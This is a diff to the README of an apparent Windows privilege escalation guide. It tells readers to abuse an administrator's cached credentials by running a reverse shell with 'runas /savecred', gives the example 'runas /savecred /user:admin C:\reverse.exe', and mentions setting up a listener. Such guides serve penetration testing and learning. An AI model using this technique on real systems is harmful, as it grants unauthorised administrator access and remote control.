NotAnoobis/Windows-PrivEsc-basic-guide/README.md

 If you find the cached credentials of an administrator create a reverse shell or download one, transfer it to the machine and execute it with the following command to get admin access:

-runas /savecred /user:WORKGROUP\User "Shell to execute"
+runas /savecred /user:User "Shell to execute"

+e.g: runas /savecred /user:admin C:\reverse.exe

 Make sure to set up a listener to catch the connection;).